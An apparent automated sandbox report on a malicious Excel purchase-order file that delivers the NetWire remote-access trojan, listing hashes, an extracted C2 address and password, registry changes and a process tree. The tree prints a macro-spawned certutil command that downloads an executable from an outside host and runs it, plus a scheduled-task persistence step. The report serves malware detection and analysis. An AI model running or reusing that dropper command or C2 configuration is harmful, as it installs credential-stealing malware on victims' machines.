netwire | 8ab1f75580a67bafa1866c71787864c366f73ee9ec34540c9ab370f6a5b0ddaa

Analysis

max time kernel
100s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
10-10-2022 14:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ADX07408 PO.xls
Size

144KB
MD5

5ed9dc08ff9847d0559f1bcd0665fa99
SHA1

acd766133e3f29abf8e450df63c04fcb40405ad7
SHA256

8ab1f75580a67bafa1866c71787864c366f73ee9ec34540c9ab370f6a5b0ddaa
SHA512

5e8554d478a7cf3d3d8274c6783e6995ba5a8be1a24d117c98d7c25796800382f8b30eca14e50b805aac709ed6841109933909073360eda138ca989566123a53
SSDEEP

3072:hk3hOdsylKlgryzc4bNhZFGzE+cL2knAL9pWkmanzr0O8qFKdshErlsD9+Z:hk3hOdsylKlgryzc4bNhZF+E+W2knALS

Score

10^/10

netwire botnet rat stealer

Malware Config

Extracted

Family

netwire

37.0.14.206:3384

Attributes

activex_autorun
false
copy_executable
false
delete_original
false
host_id
HostId-%Rand%
install_path
%AppData%\Install\Host.exe
lock_executable
false
offline_keylogger
false
password
Password234
registry_autorun
false
use_mutex
false

Signatures

NetWire RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/940-158-0x000000000041AD7B-mapping.dmp	netwire
behavioral1/memory/940-166-0x0000000000400000-0x000000000044F000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	564	768	cmd.exe	EXCEL.EXE

Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

bin.exebin.exeHost.exe

pid process

1292 bin.exe
940 bin.exe
1976 Host.exe
Loads dropped DLL 3 IoCs

Processes:

cmd.exebin.exebin.exe

pid process

1312 cmd.exe
1292 bin.exe
940 bin.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

bin.exe

description pid process target process

PID 1292 set thread context of 940 1292 bin.exe bin.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

268 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

592 timeout.exe
856 timeout.exe
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

pid	process
1292	bin.exe
940	bin.exe
1976	Host.exe

pid	process
1312	cmd.exe
1292	bin.exe
940	bin.exe

description	pid	process	target process
PID 1292 set thread context of 940	1292	bin.exe	bin.exe

pid	process
268	schtasks.exe

pid	process
592	timeout.exe
856	timeout.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

768 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

bin.exe

pid process

1292 bin.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

bin.exe

description pid process

Token: SeDebugPrivilege 1292 bin.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

EXCEL.EXE

pid process

768 EXCEL.EXE
768 EXCEL.EXE
768 EXCEL.EXE

pid	process
768	EXCEL.EXE

pid	process
1292	bin.exe

description	pid	process
Token: SeDebugPrivilege	1292	bin.exe

pid	process
768	EXCEL.EXE
768	EXCEL.EXE
768	EXCEL.EXE

Suspicious use of WriteProcessMemory 51 IoCs

Processes:

EXCEL.EXEcmd.exeWScript.execmd.execmd.exebin.exebin.exe

description	pid	process	target process
PID 768 wrote to memory of 564	768	EXCEL.EXE	cmd.exe
PID 768 wrote to memory of 564	768	EXCEL.EXE	cmd.exe
PID 768 wrote to memory of 564	768	EXCEL.EXE	cmd.exe
PID 768 wrote to memory of 564	768	EXCEL.EXE	cmd.exe
PID 564 wrote to memory of 592	564	cmd.exe	timeout.exe
PID 564 wrote to memory of 592	564	cmd.exe	timeout.exe
PID 564 wrote to memory of 592	564	cmd.exe	timeout.exe
PID 564 wrote to memory of 592	564	cmd.exe	timeout.exe
PID 564 wrote to memory of 1072	564	cmd.exe	WScript.exe
PID 564 wrote to memory of 1072	564	cmd.exe	WScript.exe
PID 564 wrote to memory of 1072	564	cmd.exe	WScript.exe
PID 564 wrote to memory of 1072	564	cmd.exe	WScript.exe
PID 564 wrote to memory of 856	564	cmd.exe	timeout.exe
PID 564 wrote to memory of 856	564	cmd.exe	timeout.exe
PID 564 wrote to memory of 856	564	cmd.exe	timeout.exe
PID 564 wrote to memory of 856	564	cmd.exe	timeout.exe
PID 1072 wrote to memory of 1616	1072	WScript.exe	cmd.exe
PID 1072 wrote to memory of 1616	1072	WScript.exe	cmd.exe
PID 1072 wrote to memory of 1616	1072	WScript.exe	cmd.exe
PID 1072 wrote to memory of 1616	1072	WScript.exe	cmd.exe
PID 1616 wrote to memory of 984	1616	cmd.exe	certutil.exe
PID 1616 wrote to memory of 984	1616	cmd.exe	certutil.exe
PID 1616 wrote to memory of 984	1616	cmd.exe	certutil.exe
PID 1616 wrote to memory of 984	1616	cmd.exe	certutil.exe
PID 1072 wrote to memory of 1312	1072	WScript.exe	cmd.exe
PID 1072 wrote to memory of 1312	1072	WScript.exe	cmd.exe
PID 1072 wrote to memory of 1312	1072	WScript.exe	cmd.exe
PID 1072 wrote to memory of 1312	1072	WScript.exe	cmd.exe
PID 1312 wrote to memory of 1292	1312	cmd.exe	bin.exe
PID 1312 wrote to memory of 1292	1312	cmd.exe	bin.exe
PID 1312 wrote to memory of 1292	1312	cmd.exe	bin.exe
PID 1312 wrote to memory of 1292	1312	cmd.exe	bin.exe
PID 1292 wrote to memory of 268	1292	bin.exe	schtasks.exe
PID 1292 wrote to memory of 268	1292	bin.exe	schtasks.exe
PID 1292 wrote to memory of 268	1292	bin.exe	schtasks.exe
PID 1292 wrote to memory of 268	1292	bin.exe	schtasks.exe
PID 1292 wrote to memory of 940	1292	bin.exe	bin.exe
PID 1292 wrote to memory of 940	1292	bin.exe	bin.exe
PID 1292 wrote to memory of 940	1292	bin.exe	bin.exe
PID 1292 wrote to memory of 940	1292	bin.exe	bin.exe
PID 1292 wrote to memory of 940	1292	bin.exe	bin.exe
PID 1292 wrote to memory of 940	1292	bin.exe	bin.exe
PID 1292 wrote to memory of 940	1292	bin.exe	bin.exe
PID 1292 wrote to memory of 940	1292	bin.exe	bin.exe
PID 1292 wrote to memory of 940	1292	bin.exe	bin.exe
PID 1292 wrote to memory of 940	1292	bin.exe	bin.exe
PID 1292 wrote to memory of 940	1292	bin.exe	bin.exe
PID 940 wrote to memory of 1976	940	bin.exe	Host.exe
PID 940 wrote to memory of 1976	940	bin.exe	Host.exe
PID 940 wrote to memory of 1976	940	bin.exe	Host.exe
PID 940 wrote to memory of 1976	940	bin.exe	Host.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\ADX07408 PO.xls"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "http://tulpexim.com/html/dll.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.vbs && echo CreateObject("WScript.Shell").Run "cmd.exe /c %temp%\bin.exe", 0, True >> %temp%\script.vbs && timeout 3 && start %temp%\script.vbs && timeout 3 && del %temp%\script.vbs
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:564

C:\Windows\SysWOW64\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:592

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c certutil.exe -urlcache -split -f http://tulpexim.com/html/dll.exe C:\Users\Admin\AppData\Local\Temp\bin.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\SysWOW64\certutil.exe
certutil.exe -urlcache -split -f http://tulpexim.com/html/dll.exe C:\Users\Admin\AppData\Local\Temp\bin.exe
5⤵
PID:984

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bin.exe
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1312

C:\Users\Admin\AppData\Local\Temp\bin.exe
C:\Users\Admin\AppData\Local\Temp\bin.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NSopOOoiUVq" /XML "C:\Users\Admin\AppData\Local\Temp\tmp6643.tmp"
6⤵
- Creates scheduled task(s)
PID:268

C:\Users\Admin\AppData\Local\Temp\bin.exe
"{path}"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:940

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
7⤵
- Executes dropped EXE
PID:1976

C:\Windows\SysWOW64\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:856

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\bin.exe

Filesize
1.2MB

MD5
29b108e40acb05c3c9c2fa8c19b166e3

SHA1
892c676275a723822d2d47dc1a48defec8bde643

SHA256
4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

SHA512
9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\bin.exe

Filesize
1.2MB

MD5
29b108e40acb05c3c9c2fa8c19b166e3

SHA1
892c676275a723822d2d47dc1a48defec8bde643

SHA256
4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

SHA512
9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\bin.exe

Filesize
1.2MB

MD5
29b108e40acb05c3c9c2fa8c19b166e3

SHA1
892c676275a723822d2d47dc1a48defec8bde643

SHA256
4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

SHA512
9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\script.vbs

Filesize
286B

MD5
b617731d1ae5b4cc113e476295d0dd53

SHA1
3640d4360758a50b547b5bf53fa8a0af2105a906

SHA256
660e8f9cb81f8e6da98ab1e1e9acd95ac54d7b59b97cfb22dc310edd9134df1e

SHA512
f7978246e6287deff350b9ace96c141b83184d7e559fb2c3080e7d2dc25a668bc3aa608b3821f860ab9db1c2d869488245eaf311e8f71793cd2224447721d3f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6643.tmp

Filesize
1KB

MD5
6840a55def503695893d606fc14ba7e3

SHA1
d98f85a129310698e82249e0b12620f02f7f394e

SHA256
80b6744875db877fa0d0306a7a2ae70835f909e8cd33d46c8f3706b6bb07ea45

SHA512
75dbb7adaf5ff8d88d4b8cb19ec0b91d7a07f6431721072db7dfbd32d2ff000d38e6c3c39f3353485b7024a7b54eff5a3796cd3da209ad78b62ef24b4dbf4d6d

Download Submit
C:\Users\Admin\AppData\Roaming\Install\Host.exe

Filesize
1.2MB

MD5
